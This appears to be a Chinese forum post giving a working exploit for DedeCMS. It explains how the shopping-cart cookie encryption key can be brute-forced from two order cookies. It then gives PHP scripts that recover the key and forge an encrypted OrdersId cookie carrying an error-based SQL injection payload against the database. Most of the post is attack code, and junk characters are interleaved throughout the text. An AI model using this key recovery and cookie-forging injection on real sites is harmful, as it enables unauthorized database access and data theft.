织梦CMS漏洞dedecms漏洞SQL注入漏洞

admin

www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php中
+ F$ K2 u8 H/ H; [7 a- Z先看一下这个shopcar类是如何生成cookie的
239      function saveCookie($key,$value)
! t. ]7 K0 K# ]240      {
241          if(is_array($value))
7 V/ ~+ H( b2 N8 W  A3 D242          {
243              $value = $this->enCrypt($this->enCode($value));
3 u4 j' E: [8 N9 e5 u8 b6 W! m244          }
245          else
. H: P1 p+ b) b+ @# h246          {
4 n* Z/ m: }" Y" J247              $value = $this->enCrypt($value);
248          }
249          setcookie($key,$value,time()+36000,’/');
250      }
0 m$ o! w" [9 h! M; |9 ^简单的说，$key就是cookie的key，value就是value，enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型，关键是enCrypt函数
7 A/ V& w6 {% r" S* I+ ?; |$ S186      function enCrypt($txt)
187      {
188          srand((double)microtime() * 1000000);
189          $encrypt_key = md5(rand(0, 32000));
190          $ctr = 0;
  c' R! o; Z# W' m, `* a2 ?; e191          $tmp = ”;
3 Q, |) {. G4 D( g6 O192          for($i = 0; $i < strlen($txt); $i++)
' y( ^' B: f+ Y) m$ f3 r7 D& W193          {
194              $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
195              $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
! U1 l& v2 |3 p/ @196          }
197          return base64_encode($this->setKey($tmp));
: |9 D7 R5 N9 I" K2 F" C& `3 b% I198      }
' }$ A, C* ^" w, J8 _: S213      function setKey($txt)
' f( u- C3 E0 b: q+ {' t214      {
215          global $cfg_cookie_encode;
% N9 C% V! H5 q" M8 z" M. v- {216          $encrypt_key = md5(strtolower($cfg_cookie_encode));
217          $ctr = 0;
218          $tmp = ”;
9 t1 F* Y4 a$ m+ I219          for($i = 0; $i < strlen($txt); $i++)
  `2 W# E! y: ^; U4 u220          {
9 Q- y. \  U( L; ~. J; h221              $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
5 G- j1 [& _4 u222              $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
223          }
' J; m) z4 j# _- L224          return $tmp;
5 [1 i, l4 o3 k- u8 f# J" H225      }
enCrypt的参数$txt 我们是可知的，返回值就是cookie的值，这个我们也是可知的
0 |5 w) x6 G5 P9 J  r然后到了enCrypt调用 setKey时的参数$tmp，这个参数在某种意义上，我们也是可知的，因为$encrypt_key = md5(rand(0, 32000));只有32000种可能，我们可以推出32000种可能的$tmp，从而推出32000种可能的md5(strtolower($cfg_cookie_encode))，对了，忘记说了，我们的目的是推测出setKey中$encrypt_key的值，然后才能任意构造出购物车的cookie，从推出的32000种md5(strtolower($cfg_cookie_encode))，简单过滤掉非字母数字的key，就只剩下几百个可能的key，然后我们再从新下一次订单，然后再获取几百个可能的key，然后取交集，得到最终key。
: P5 e% o8 N% O3 _- E具体代码如下：
+ ]1 G" ?; ?+ k# t<?php
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
/ t; U9 [" p( z/ c/ d) ?$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
6 S6 R: \$ n  [! Cfunction reStrCode($code,$string)
{
$code = base64_decode($code);
$key = “”;
for($i=0 ; $i<32 ; $i++)
8 h( b5 a. Y# h{
$key .= $string[$i] ^ $code[$i];
}
return $key;
}
3 S" @2 f. e9 I- a" I5 ?2 Zfunction getKeys($cookie,$plantxt)
" C0 e2 k# G( {" a& u& f{
. d' ?! K4 h; y  F$ K9 b; G$tmp = $cookie;
$results = array();
for($j=0 ; $j < 32000; $j++)
{

$txt = $plantxt;
5 I2 D: [6 K5 r# I5 O0 S$ctr = 0;
$tmp = ”;
2 h& p5 p8 X4 {" o3 x$encrypt_key = md5($j);
for($i =0; $i < strlen($txt); $i ++)
{
4 W8 k; _: @  M! ~- ~$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
1 k2 l0 H6 O1 I# c' ]$string = $tmp;
$code = $cookie;
+ x+ n: _  Z- r. r; B+ C$result = reStrCode($code,$string);
if(eregi(‘^[a-z0-9]+$’,$result))
. M5 _7 y2 H( R. ^6 p% v{
echo $result.”\n”;
$results[] = $result;
3 G1 h* p& E! t  W5 L& V}
" |* L+ j# F6 e* J# x9 q/ ?}
return $results;
* u+ E" S6 l+ k: p- O" Q}
3 G( a: \  G! Q$results1 = getKeys($cookie1,$plantxt);
' r- Q" b3 F9 c6 \0 |6 S) q- @! f$results2 = getKeys($cookie2,$plantxt);
print “\n——————–real key————————–\n”;
8 R5 Z' V0 q/ `& Q  L7 kforeach($results1 as $test1)
  D; ]$ h4 V" J{
# w) l- e$ T$ ]4 b) yforeach($results2 as $test2)
{
# ~4 v1 l' D, _+ N5 I1 mif($test1 == $test2)
4 _2 K2 T- W' @* U" n; f{
echo $test1.”\n”;
}
}
7 y0 y- r1 R' k( k; |4 y( y( q}
7 ?6 c" F# ?7 S! b: ^8 [. f' |?>
# j! U, R$ b1 mcookie1 和 cookie2 是我下了两次订单后分别生成的cookie，
& e( n# A$ t8 R  M- tplantxt可以根据页面来自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
/ Q9 X$ `& a4 c  y1 a然后推算出md5(strtolower($cfg_cookie_encode))
得到这个key之后，我们就可以构造任意购物车的cookie
接着看
8 j; ~7 q+ s7 ]% V& N20  class MemberShops
21  {
22      var $OrdersId;
23      var $productsId;
4 `5 p7 W( {3 c; }( |8 l! G24
25      function __construct()
26      {
27          $this->OrdersId = $this->getCookie(“OrdersId”);
28          if(empty($this->OrdersId))
6 c  U  C' p5 [" l( P29          {
2 ~8 K+ ]( s% C% @* Y30              $this->OrdersId = $this->MakeOrders();
31          }
5 o& f# J: ~7 V32      }
发现OrderId是从cookie里面获取的
5 P9 S3 Y5 }/ o然后
* E5 x' A5 G3 v  n1 F  i/plus/carbuyaction.php中的
2 E8 @8 V/ [( U/ p29      $cart    = new MemberShops();
7 x( q; d5 V/ ?( y2 d! q39      $OrdersId = $cart->OrdersId;        //本次记录的订单号
+ G) ~  Q: Q  Z……
173          $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
接着我们就可以注入了
通过利用下面代码生成cookie：
<?php
; j- B4 _7 A% x6 ~+ k: ?- X$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″;   // here is the key, please change here
function setKey($txt)
. k# }7 J+ a1 x2 o5 ?& X{
# j9 T& b" y$ V3 B- Kglobal $encrypt_key;
$ctr = 0;
5 b5 z6 M. n2 V5 r7 ?$tmp = ”;
for($i = 0; $i < strlen($txt); $i++)
, D6 g6 `: l. e! l{
  P; f( w1 }' J1 u7 o7 q' J$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
; j7 b2 Q4 Y/ H0 c% T}
; c( R1 B/ c8 A# _return $tmp;
}
function enCrypt($txt)
0 X0 a: X- T& J* ~, Z3 f{
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0, 32000));
$ctr = 0;
3 d- \" J! D/ j# R$tmp = ”;
for($i = 0; $i < strlen($txt); $i++)
{
* @4 D+ X! z$ e( j6 Q) o$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
return base64_encode(setKey($tmp));
}
0 Y8 }. r2 L5 I) \for($dest =0;$dest = enCrypt($txt);)
2 j( D6 ]4 ]& c& }1 ^4 B{
1 }$ I& t: l2 B9 W# wif(!strpos($dest,’+'))
6 b5 ^* p( ^* J- r{
break;
}
}
$ O# g, @, _. e. T1 r+ hecho $dest.”\n”;
?>

% R+ i8 O* I1 M# O2 ]​